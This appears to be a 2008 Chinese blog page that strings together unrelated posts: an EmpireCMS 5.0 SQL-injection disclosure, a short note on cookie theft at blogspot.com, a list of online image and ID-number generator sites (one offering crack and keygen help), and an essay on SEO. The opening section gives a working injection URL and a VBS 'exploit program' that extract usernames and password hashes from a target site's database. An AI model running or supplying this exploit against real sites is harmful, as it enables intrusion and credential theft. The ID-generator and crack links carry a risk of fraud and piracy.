博文
漏洞文件 /e/member/list/index.php文件:内容如下:if($sear){$keyboard=RepPostVar2($_GET['keyboard']);if($keyboard){$add.=$where.$user_username." like '%$keyboard%'";}$search.="&sear=1&keyboard=$keyboard";}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.<* 参考http://www.sebug.net/vulndb/3860/ http://www.nukeblog.cn*>测试方法:[www.sebug.net]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
VBS利用程序代码如下
DIM a,i,e,b,ie,cmd5i=InputBox ("输入目标地址 格式http://www.phome.net","帝国CMS 0DAY利用程序 BY Nuke")If i="" Thenmsgbox "请输入地址"WScript.QuitEnd Ifb=InputBox ("输入表名默认为phome_enewsuser","帝国CMS 0DAY利用程序 BY Nuke","phome_enewsuser")If b="" Thenmsgbox "请输入表名"WScript.QuitEnd Ife = "/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+" & b & "/*"ie = i & eSet a=WScript.CreateObject("InternetExplorer.Application") a.visible=True a.navigate iemsgbox "32位的MD5祝你好运!"
2008年8月17日星期日
帝国CMS5.0“/e/member/list/index.php”文件注射漏洞
blogspot.com窃取cookie漏洞,发布时间:2008-08-17.SBEUGID:SEBUGV2008083859
描述:blogspot.com站点为Google的博客.因对过滤不严,造成漏洞。支持html,然后可以在其中插入类似如下内容.获取cookie<* 参考http://www.winshell.cn/read.php?1028*>
在线生成图片的网址大收集
粉丝身份证:http://id.igogo8.com/
制作印章:http://www.makepic.com/print.php
http://www.topdig.net
邮址图片生成:http://www.makepic.com/email.php
条形码生成:http://www.makepic.com/barcode.php
Kiss学堂 颁发结业证:http://www.makepic.com/kiss/cert.php
生成头像:http://www.eoool.com/ImageDIY/DIYChooseImg.aspx?ImgSize=96x96x1
邮件:http://www.eoool.com/Sevice.aspx?TypeID=1
聊天图标:http://www.eoool.com/Sevice.aspx?TypeID=2
博客图标:http://www.eoool.com/Sevice.aspx?TypeID=3
网络书签:http://www.eoool.com/Sevice.aspx?TypeID=5
http://www.topdig.net
朋友圈:http://www.eoool.com/Sevice.aspx?TypeID=4
按扭:http://www.eoool.com/Sevice.aspx?TypeID=11
生成拼凑图:http://blog.outer-court.com/letters/
一个日本武士刀劈出你需要的字:
http://tools.fodey.com/generators/animated/ninjatext.asp
生成几种卡通人物对话动态图片:
http://tools.fodey.com/generators/animated/talking_squirrel.asp
香烟盒生成,可以做警告图片:http://tools.fodey.com/generators/cigarette_packet/generator.cig
支持多种域名的Email图标的生成: http://www.nhacks.com/email/
两个地址支持两种风格任意文本的Email图标的生成:
http://sagittarius.dip.jp/~toshi/cgi-bin/designmail/designmail.html
http://sagittarius.dip.jp/~toshi/cgi-bin/catmark/catmark.html
http://www.topdig.net
在线favicon生成器: http://www.html-kit.com/e/favicon.cgi
支持各种类型图片的生成,可以选择设置的条件非常灵活:
http://www.abi-station.com/tchinese/
支持大量中文字体签名图标生成: http://www.youmade.com/font/
Flickr杂志封面生成器: http://flagrantdisregard.com/flickr/magazine.php
动态生成有趣图片:
爱因斯坦
http://www.hetemeel.com/einsteinform.php
山姆大叔
http://www.hetemeel.com/unclesamform.php
辞典
http://www.hetemeel.com/dictionaryform.php
魔法师
http://www.imagegenerator.net/create/dumbledore/
http://www.topdig.net
Flickr Logo风格图片生成器: http://flickr.nosv.org/
按钮生成网站:
http://kalsey.com/tools/buttonmaker/
http://www.lucazappa.com/brilliantMaker/buttonImage.php
http://www.feedforall.com/public/rss-graphic-tool.htm
http://www.kalsey.com/tools/buttonmaker/
http://www.yugatech.com/make.php
http://www.hkwebs.net/catalog/tools/buttonmaker/index.php
Email图标生成网站:
http://email.playtime.uni.cc/
http://services.nexodyne.com/email/
http://gizmo967.mgs3.org/Gmail/
http://www.hkwebs.net/catalog/tools/gmail/
http://sagittarius.dip.jp/~toshi/cgi-bin/designmail/designmail.html
http://www.eoool.com/
http://www.topdig.net
Logo生成网站:
http://phorum.com.tw/Generator.aspx
http://www.logoyes.com/lc_leftframe.htm
http://cooltext.com/Default.aspx
Banner图片制作网站:
http://www.bannerbreak.com/index.php
在线图片生成网站:
http://www.streetsigngenerator.com/
http://www.letterjames.de/
图片分割器: http://www.html-kit.com/e/is.cgi
立体图片生成器: http://www.chami.com/html-kit/services/imge/
http://www.topdig.net
图片生成邮票: http://photo.stamps.com/PhotoStamps/?source=si00001331
个性拼图: http://www.jigcool.com/jigonline/jigonline1_sc.php
印章制作: http://caishu.sina.com.cn/
韩国身份证的生成以及验证:
http://www.udeng.com/images/hanguo.htm
GIF图片的文字LOGO在线生成:
http://www.3dtextmaker.com/cgi-bin/3dtext.pl
在线制作logo,bannar的网站:
http://www.crazystudy.com/
http://www.topdig.net
SAINT.Assess the Security of
Computer Networks
http://www.saintcorporation.com/saint/
Abacus.Intrusion Prevention System
http://www.psionic.com/abacus/
Firewall Generator(在线生成简单的防火墙脚本)
http://www.citadec.com/FirewallGenerator.html
身份证号码在线生成器
http://i972.net/~gen/
在线字体图片生成
http://www.youmade.com/font/
http://www.topdig.net
中外破解补丁和注册机在线求救
http://hmay.qq.topzj.com/
在线生成条码打印
http://www.027hc.com/y1.asp
http://www.nlscan.com/soucecentre/demo.asp
http://www.gzbonny.com/asp/barcode.asp
http://www.topdig.net
在线图形特效生成
http://www.chami.com/
聊天工具在线状态生成器
没有SEO才是真的SEO
大道无形,跳出SEO的迷思,没有SEO才是真的SEO
引子:老君曰:大道无形,生育天地。大道无情,运行日月。大道无名,长养万物。吾不知其名,强名曰道。夫道者,有清有浊,有动有静。天清地浊,天动地静。男清女浊,男动女静。降本流末,而生万物。清者浊之源,动者静之基。人能常清净,天地悉皆归。
开篇:先说两个自己亲身经历的事情:
A.经常和一些企业老总闲聊,老总们也是勤于学习的,在网上看了些SEO的介绍,自然排名上位,便心有戚戚焉,碰上我这骨灰级的自然要讨教一些经验。一般的企业站无非几个产品,企业新闻也就那么几条,老板们还喜欢赶个时髦,非得首页弄个大大的FLASH,半天Loading不下来。内容更新又少,专职人员少。这样的站说实话自然顺位排到SE的前列是非常罕见的。所以我的回答常常是兜头一盆冷水,劝那些老总如其花钱找所谓的SEO高手,不如老老实实花钱做SE的关键字推广。除了所谓SEO高手费用不菲之外,另外即使做上去也无法一劳永逸。方法违规甚至被惩处,升天不成反堕地狱。何况类似“加盟”这样的关键字想用SEO高手津津乐道的方法是永远做不上“百度”搜索结果首页的,为什么呢?因为它第一页左,右手全是花钱的关键字推广。
所以对企业来说最好的SEO就是向SE购买位置。没有比这个更保险,更稳当了。企业站点推广最需要的人才不是所谓的SEO高手,而是善于挑选恰当的关键字,合理使用推广费用的人才。
B.SEO是个社会系统工程而不是所谓几招独门秘籍
曾有一家因关键字堆砌作弊被百度封锁3年之久,ALEXA排名万名以内的行业门户站点找到我探询解封之道,当初被封他们也很快改正了,但是没有被原谅。时间过去不算短,技术人员也换了好几茬,网上传说的解封之道也是屡试屡败。和其负责人聊起的时候也只有无奈和心疼。
我提出了自己的看法并付诸行动,方法超级简单而且不花钱,在没有方法的情况下权且死马当做活马医的心态,因为方法即使失败结果也不可能更坏。
一共走了3步:
1.踢场子
百度每年都会在本市配合代理商于星级酒店拉些企业负责人来参加营销会议。当然我们也收到了百度代理商的邀请函,会场上百度的营销专员慷慨激昂,底下听众也多半跃跃欲试签单,开放提问阶段居然都是批评百度的,其潜在顾客听了另一种声音血也开始冷了。营销专员脸面挂不住了,会后又要私下沟通一下,当然他根本没权利解封,但是肯定会汇报。
2.送流量
把以前部分频道上挂的ADSENSE广告通通取消掉。注册百度联盟,挂上百度的搜索条,随便几万个IP的流量,却带不来几毛钱,实在是寒,当然并不是为了赚钱,只是表示一种臣服的姿态,拱手孝敬一些流量。同时也证明现在的站点不靠百度流量也不小。
3.请求函
EMS一份请求解封函件,详细描述了被封的来龙去脉,同时恳求解封。同时附上了网站所取得的文化部,信产部,通管局等七七八八的证件复印件。申诉本来是有专门邮箱的,但是我选择快件,信件相对EMAIL更加郑重。
结果是封了3年之久的站点,一周后开始重新收录,在3个月内已经达到正常收录水平,部分关键字达到理想水平。你能说这不是SEO吗?
当然此次成功的方法,也未必保证能够COPY。因为我们局外人还是始终无法探知其内部处理的具体流程和准则。从技术派来说这些方式一点技术含量没有最被瞧不起。但是如果你把SE想象成一个活生生的人就很容易理解了。
中篇:SEO牵涉的利益关系:
SE,普通SE用户,SEOer,利用SEO推广者
普通SE用户:快速,简便得到最想寻找的信息。
SE: 快速返回最准确的检索结果,不断改善用户的易用便捷性。
SEOer:改善具体某一个网站排名、流量、面向SE的友好性等等
利用SEO推广者:在最小金钱代价下换取更多流量与潜在商机。
SE与SEOer争夺的核心利益:SE搜索质量用户体验,部分利用SEO推广者付费用户
以利益为导向来考虑,有时候很多事情就不难理解了。
用一种很通俗的思维来考虑,SE是人写的,无论自然顺位排名有多少个条件和权重,但是规则也是从正常人的心理状态来考虑,SEOer通过观察和实践不断的猜测,验证,判断这些规则并加以利用之,SE的规则不断的在变动,客观上造成SEOer只能是后发制SE,但是当这些方法泛滥成灾必然带来SE的修正,就象web2.0初兴,SE们给BLOG的权重都很高。SEOer们一哄而上拼命Trackback,发垃圾评论,甚至费尽心思开发出群发工具。结果呢?导致nofollow标签的大量应用与SE中权重不断的丧失。从这个层面来说SEOer永远在“利用SEO推广者”付费的盘子里分不到多少羹,而把自己变成了SE的“磨刀石”。
为了SEO而SEO的站点,会陷入SEO的迷思,将会本末倒置,抛开SEO来看站点,网站是一种信息的载体,工具,协助用户实现需求和价值。应该绝大部分精力想的是怎么更好满足客户,超越竞争者。从内容形式上来说高质量的原创内容与高频率的更新比什么SEO都有用。也许Meta、Robots 、"H1、B、颜色、URL、PR、"外链之类的东西可能在某段时间内很有效果,但是却无法永续。而没有或无精力去把握本源,指望密籍、高招、高人,可能会得逞一时,但不会长久,甚至是灭顶之灾,因为这种本质上是在破坏SE的用户体验。而这一点恰恰是SE的命根子。《史记?五帝本纪》云:“父义,母慈,兄友,弟恭,子孝,内平外成。”同理SEO的王者之道:内平外成!
下篇:SEO是一种心态
SEO真的是仅仅面向搜索引擎的优化?那搜索又是为谁呢?一个真正的SEO行为如其说针对搜索不如说针对用户。仅仅考虑SE喜好而为必然剑走偏锋花了很多精力在用户看不到的地方,陷入迷信密籍与技巧。
SEO是一种习惯
无数的文章大谈TITLE,META,ROBOTS,ALT,SITEMAP等等技巧。其实这是技术的基本编码习惯,很遗憾的是现实生活中技术绝大多数不懂这些,也没想到研究这些,上班干活,老板交待的功能实现了拉倒,其它的不干我事。所以常常指导干这些的都是技术半桶水。当然这些也算是SEO涵盖的范畴,但是重要吗?大家都这么干就并不是非常重要,就象大家都是W3C标准,对于SE来说这一点几乎可以忽略不计了。辩证的来看有比没有强,这种类型的所谓SEO说白了应该是技术人员融入到自己的编码习惯中去,而不应该还让这些技术半桶水来指点。
SEO是一种动态实践而没有一成不变的密籍
SEO需要花费时间去试验,观察搜索的变化,需要不断的研究日志及统计数据,了解SE对该站的动态。一个人弄个几十个站,每天观察搜索的变化,不断试验,不出半年我保证你是个周围人心目中的SEO高手,对于SE及SEO能头头是道。
网络上SEO介绍文章汗牛充栋,其实基本上是好的不灵,坏的灵。道理很简单即使真的是一个很有用的方法,最多代表在那篇文章发表那一刻及之前有效果。等到你看到,可想而知很多人会看到包括制订搜索规则的人。自然这种方法会失去效力。
SEO是一种低调的事业
高调唱SEO的下场都是网站被搜索封光光,沦落到卖所谓的密籍和技术,且不论那些密籍技术是否真的有效果。仅仅是高调就犯了大忌。SE都被NASQA高赢利预期压的喘不过气来,你倒好还这么嚣张的和我抢客户,大家都找你SEO了,我关键字,竞价卖谁去?结局只能是被灭掉。你技术牛是不,我规则制不住你,没关系,我人工把你站弄到10页以后去。你能咋地?当然另一种高调吆喝传授日进斗金SEO技术的几近乎骗,就不在这讨论了,因为如果真的这么好赚,他为什么不自己赚,还要肥了你。
SEO需要尊重SE
尊重SE需要体现在各各方面,SE可能会出现这样或者那样的问题。平常心对待不要恶语中伤。毕竟SEO是需要靠着SE混饭吃,皮之不存毛将焉附?这方面我有过很大教训,某年某月某日是中国现代历史上一件至今还很忌讳的事件的**周年纪念日,某SE积极配合在搜索中把**这个数字给屏蔽了。导致的结果是把域名里含有**的一个著名网站给屏蔽了。我当晚发现在网络上逞能第一个发布了该信息,当初的本意无非有噱头弄点流量,没想其他的。该信息被很多业内BLOG转载,第二天被该SE惩罚,封域名一年。到这一步了再好的SEO又有什么用呢?说倒底SE如人,中国人做的SE,其必然具有中国人的性格,优,缺点,国民劣根性。搜索如人,人如搜索。心中没有SEO才是真的SEO
本文为完全原创,独家授权发表于“畅言SEO”征文大赛,转载请遵循CC署名非商业(作者:of...@yahoo.cn)其中观点代表一家之言,怡笑大方。诚心欢迎诸前辈,朋友们多多指教。